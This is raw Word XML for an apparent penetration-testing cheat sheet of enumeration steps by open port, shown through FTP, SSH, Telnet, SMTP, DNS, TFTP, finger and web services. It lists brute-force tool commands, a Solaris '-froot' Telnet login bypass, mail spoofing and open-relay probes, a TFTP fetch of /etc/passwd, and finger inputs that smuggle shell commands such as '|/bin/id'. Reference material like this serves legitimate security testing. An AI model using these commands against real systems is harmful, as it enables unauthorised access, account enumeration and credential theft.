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15802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03545B" w14:textId="2E046A72" w:rsidR="00AE180D" w:rsidRDefault="00AE180D">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="5E5EA963" w14:textId="4508979F" w:rsidR="00AE180D" w:rsidRDefault="00AE180D" w:rsidP="00AE180D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05538" w:history="1">
            <w:r w:rsidRPr="00B44FD1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs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1CD2" w14:textId="00E7F43F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39" w:history="1">
            <w:r w:rsidRPr="00B44FD1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>FTP port 21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86AC" w14:textId="3E23ECCA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0" w:history="1">
            <w:r w:rsidRPr="00B44FD1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SSH port 22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3AFD" w14:textId="30686EB8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1" w:history="1">
            <w:r w:rsidRPr="00B44FD1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Telnet port 23</w:t>
            </w:r>
            <w:r w:rsidRPr="00B44FD1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B44FD1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman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F931" w14:textId="18312FA6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2" w:history="1">
            <w:r w:rsidRPr="00B44FD1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Sendmail Port 25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9B41" w14:textId="0DF0F243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3" w:history="1">
            <w:r w:rsidRPr="00B44FD1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>DNS port 53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C6E8" w14:textId="6DBEB993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4" w:history="1">
            <w:r w:rsidRPr="00B44FD1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>TFTP port 69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9842" w14:textId="18D70CA8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5" w:history="1">
            <w:r w:rsidRPr="00B44FD1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Finger Port 79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FDFC" w14:textId="19A3360F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6" w:history="1">
            <w:r w:rsidRPr="00B44FD1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Web Ports 80, 8080 etc.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7680" w14:textId="310CBEEF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7" w:history="1">
            <w:r w:rsidRPr="00B44FD1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Portmapper port 111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F10E" w14:textId="39B412E5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8" w:history="1">
            <w:r w:rsidRPr="00B44FD1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>NTP Port 123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76C9" w14:textId="75984E7C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49" w:history="1">
            <w:r w:rsidRPr="00B44FD1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>NetBIOS Ports 135-139,445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C88D" w14:textId="19978A08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0" w:history="1">
            <w:r w:rsidRPr="00B44FD1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SNMP port 161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804B" w14:textId="6CF83BB6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1" w:history="1">
            <w:r w:rsidRPr="00B44FD1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>LDAP Port 389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AA7D" w14:textId="5E4931B2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2" w:history="1">
            <w:r w:rsidRPr="00B44FD1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>PPTP/L2TP/VPN port 500/1723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7752" w14:textId="4B3EC4FD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3" w:history="1">
            <w:r w:rsidRPr="00B44FD1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Modbus port 502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4CA4" w14:textId="63704D14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4" w:history="1">
            <w:r w:rsidRPr="00B44FD1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>rlogin port 513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3734" w14:textId="787FB538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5" w:history="1">
            <w:r w:rsidRPr="00B44FD1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>rsh port 514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70AD" w14:textId="05DEDF92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6" w:history="1">
            <w:r w:rsidRPr="00B44FD1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SQL Server Port 1433 1434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6BD3" w14:textId="3F9BD76E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7" w:history="1">
            <w:r w:rsidRPr="00B44FD1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Citrix port 1494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425C" w14:textId="4F72CC21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8" w:history="1">
            <w:r w:rsidRPr="00B44FD1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Oracle Port 1521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B2EA" w14:textId="3698326F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59" w:history="1">
            <w:r w:rsidRPr="00B44FD1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>NFS Port 2049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9FA2" w14:textId="0E18760E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0" w:history="1">
            <w:r w:rsidRPr="00B44FD1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Compaq/HP Insight Manager Port 2301,2381open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07E1" w14:textId="1912A3A5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1" w:history="1">
            <w:r w:rsidRPr="00B44FD1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>MySQL port 3306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3083" w14:textId="02C27367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2" w:history="1">
            <w:r w:rsidRPr="00B44FD1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>RDesktop port 3389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C909" w14:textId="05ED089B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3" w:history="1">
            <w:r w:rsidRPr="00B44FD1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Sybase Port 5000+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47FE" w14:textId="734F2D19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4" w:history="1">
            <w:r w:rsidRPr="00B44FD1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SIP Port 5060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C06D" w14:textId="50A95F56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5" w:history="1">
            <w:r w:rsidRPr="00B44FD1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>VNC port 5900^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F7AD" w14:textId="502B2787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6" w:history="1">
            <w:r w:rsidRPr="00B44FD1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>X11 port 6000^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9F22" w14:textId="3BF52B9E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7" w:history="1">
            <w:r w:rsidRPr="00B44FD1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Tor Port 9001, 9030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BBC9" w14:textId="3BB636A2" w:rsidR="00AE180D" w:rsidRDefault="00AE18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705568" w:history="1">
            <w:r w:rsidRPr="00B44FD1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Jet Direct 9100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EF23" w14:textId="585ACA01" w:rsidR="00AE180D" w:rsidRDefault="00AE180D">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="3EE245C0" w14:textId="77777777" w:rsidR="00AE180D" w:rsidRDefault="00AE180D" w:rsidP="008C6E63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theme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="6699FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F5B582F" w14:textId="77777777" w:rsidR="00AE180D" w:rsidRDefault="00AE180D" w:rsidP="008C6E63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theme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="6699FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4234566E" w14:textId="099AB696" w:rsidR="008C6E63" w:rsidRPr="006A295D" w:rsidRDefault="008C6E63" w:rsidP="008C6E63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theme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="6699FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc96705538"/>
      <w:r w:rsidRPr="006A295D">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="6699FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Enumeration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="6CE4A482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" w:name="_Toc96705539"/>
      <w:r w:rsidRPr="006A295D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>FTP port 21 open</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="1A87F44F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Fingerprint server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB42F8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telnet ip_address 21 (Banner grab)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579003B1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Run command ftp ip_address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEA793D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ftp@example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2039EE2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Check for anonymous access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6971411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ftp ip_addressUsername: anonymous OR anonPassword: any@email.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DA74FB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Password guessing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC69D6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Hydra brute force</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="719202B6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medusa</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="097EEF17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Brutus</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="65A6F947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51B6144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ftpusers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5134A87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ftp.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2F60F9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proftpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A833CE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MiTM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD84FB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pasvagg.pl</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2876C5EC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" w:name="_Toc96705540"/>
      <w:r w:rsidRPr="006A295D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SSH port 22 open</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="6F93A940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Fingerprint server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED0F72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telnet ip_address 22 (banner grab)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A5A90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scanssh</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4B5109B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scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEE8B78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Password guessing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206965AB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ssh root@ip_address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066E1A54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guess-who</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="48F4CDC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./b -l username -h ip_address -p 22 -2 &lt; password_file_location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7286124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Hydra brute force</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1C78B56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brutessh</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5DD397C4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Ruby SSH Bruteforcer</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="19721D43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49D94BC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ssh_config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303C491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sshd_config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CBC0C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authorized_keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAE9311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ssh_known_hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664CBCA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.shosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EF4052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SSH Client programs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D834CD9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tunnelier</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3128107A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winsshd</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="690CE4A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putty</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2EAD77D9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winscp</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4FDB7FBF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3" w:name="_Toc96705541"/>
      <w:r w:rsidRPr="006A295D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Telnet port 23 open</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="32C099E7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Fingerprint server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DD12C1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telnet ip_address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392535C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Common Banner ListOS/BannerSolaris 8/SunOS 5.8Solaris 2.6/SunOS 5.6Solaris 2.4 or 2.5.1/Unix(r) System V Release 4.0 (hostname)SunOS 4.1.x/SunOS Unix (hostname)FreeBSD/FreeBSD/i386 (hostname) (ttyp1)NetBSD/NetBSD/i386 (hostname) (ttyp1)OpenBSD/OpenBSD/i386 (hostname) (ttyp1)Red Hat 8.0/Red Hat Linux release 8.0 (Psyche)Debian 3.0/Debian GNU/Linux 3.0 / hostnameSGI IRIX 6.x/IRIX (hostname)IBM AIX 4.1.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.IBM AIX 4.2.x or 4.3.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.Nokia IPSO/IPSO (hostname) (ttyp0)Cisco IOS/User Access VerificationLivingston ComOS/ComOS - Livingston PortMaster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638DE272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telnetfp</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="55351B9C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Password Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71711499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Common passwords</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1A30252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Hydra brute force</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="440CF3B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Brutus</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3FEDE0E9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telnet -l "-froot" hostname (Solaris 10+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DA1E0B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01BF45D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/etc/inetd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E72BA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/etc/xinetd.d/telnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C81E09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/etc/xinetd.d/stelnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D91B933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4" w:name="_Toc96705542"/>
      <w:r w:rsidRPr="006A295D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Sendmail Port 25 open</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="3A7ACA25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Fingerprint server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A9C78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telnet ip_address 25 (banner grab)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73578670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Mail Server Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCD6A1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Enumerate users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066B509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VRFY username (verifies if username exists - enumeration of accounts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E007EA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EXPN username (verifies if username is valid - enumeration of accounts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5407FB4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Mail Spoof Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513EA8A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HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD8154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Mail Relay Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB5617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HELO anything</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58690B3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Identical to/from - mail from: &lt;nobody@domain&gt; rcpt to: &lt;nobody@domain&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E10A69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Unknown domain - mail from: &lt;user@unknown_domain&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64594385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Domain not present - mail from: &lt;user@localhost&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F803C4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Domain not supplied - mail from: &lt;user&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059640E6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Source address omission - mail from: &lt;&gt; rcpt to: &lt;nobody@recipient_domain&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704472BF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Use IP address of target server - mail from: &lt;user@IP_Address&gt; rcpt to: &lt;nobody@recipient_domain&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF2F643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Use double quotes - mail from: &lt;user@domain&gt; rcpt to: &lt;"user@recipent-domain"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDE18F7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User IP address of the target server - mail from: &lt;user@domain&gt; rcpt to: &lt;nobody@recipient_domain@[IP Address]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6670B783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Disparate formatting - mail from: &lt;user@[IP Address]&gt; rcpt to: &lt;@domain:nobody@recipient-domain&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3CF921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Disparate formatting2 - mail from: &lt;user@[IP Address]&gt; rcpt to: &lt;recipient_domain!nobody@[IP Address]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772E26F9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409A234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sendmail.cf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7449431F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submit.cf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A0E9A8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5" w:name="_Toc96705543"/>
      <w:r w:rsidRPr="006A295D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>DNS port 53 open</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="6D30B35C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Fingerprint server/ service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005DCEC1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host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D17F2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host [-aCdlnrTwv ] [-c class ] [-N ndots ] [-R number ] [-t type ] [-W wait ] name [server ] -v verbose format -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR. -a Same as –t ANY. -l Zone transfer (if allowed). -f Save to a specified filename.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6508E2F9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nslookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F85BD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nslookup [ -option ... ] [ host-to-find | - [ server ]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E780A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dig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36402A3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dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A050D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whois-h Use the named host to resolve the query -a Use ARIN to resolve the query -r Use RIPE to resolve the query -p Use APNIC to resolve the query -Q Perform a quick lookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F49AE7A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DNS Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B779E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Bile Suite</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="21CB745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BiLE.pl [website] [project_name]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153C2CD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BiLE-weigh.pl [website] [input file]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4091F7A5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vet-IPrange.pl [input file] [true domain file] [output file] &lt;range&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD65B3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vet-mx.pl [input file] [true domain file] [output file]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C764AD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exp-tld.pl [input file] [output file]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7122B9C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jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3D072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qtrace.pl [ip_address_file] [output_file]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C48BF6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jarf-rev [subnetblock] [nameserver]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE2E65E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txdns</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="04ACA73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txdns -rt -t domain_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E971D86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txdns -x 50 -bb domain_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3654A14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txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c: \hostlist.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BB12F4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0ED2FA6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host.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDCFA2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resolv.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E74FDD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named.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3939DA06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6" w:name="_Toc96705544"/>
      <w:r w:rsidRPr="006A295D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>TFTP port 69 open</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="7B6DDA43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TFTP Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405B447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tftp ip_address PUT local_file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085F248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tftp ip_address GET conf.txt (or other files)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45096D4B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Solarwinds TFTP server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B2A1B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tftp – i &lt;IP&gt; GET /etc/passwd (old Solaris)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F22680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TFTP Bruteforcing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BBA12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TFTP bruteforcer</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D21B51A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Cisco-Torch</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="612D6F46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7" w:name="_Toc96705545"/>
      <w:r w:rsidRPr="006A295D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Finger Port 79 open</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="2712BF8D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User enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154B460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'a b c d e f g h' @example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C9A70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admin@example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A18708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user@example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A200D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0@example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50067C5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.@example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DBE4D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**@example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E7463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test@example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547E006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@example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E24763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Command execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D95DE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"|/bin/id@example.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F3746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"|/bin/ls -a /@example.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC67051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Bounce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CFB189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user@host@victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDAB40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 @internal@external</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34385F09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8" w:name="_Toc96705546"/>
      <w:r w:rsidRPr="006A295D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Web Ports 80, 8080 etc. open</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="71A299A2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Fingerprint server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05ECD2F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Telnet ip_address port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6967068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Firefox plugins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30735CD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All</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BD631F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firecat</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="00906CE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Specific</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAE0506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add n edit cookies</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="120398BE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asnumber</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F075CA2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2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header spy</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="487981C0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live http headers</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="787386DA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shazou</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="03094CD0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web developer</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="16D48588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Crawl website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72136E3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lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E77896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httprint</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7ADFC77A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Metagoofil</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="75F48C0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metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41ACDA5C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Web Directory enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F41D1F7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Nikto</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3B20C2B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nikto [-h target] [options]</w:t>
      </w:r>
    </w:p>
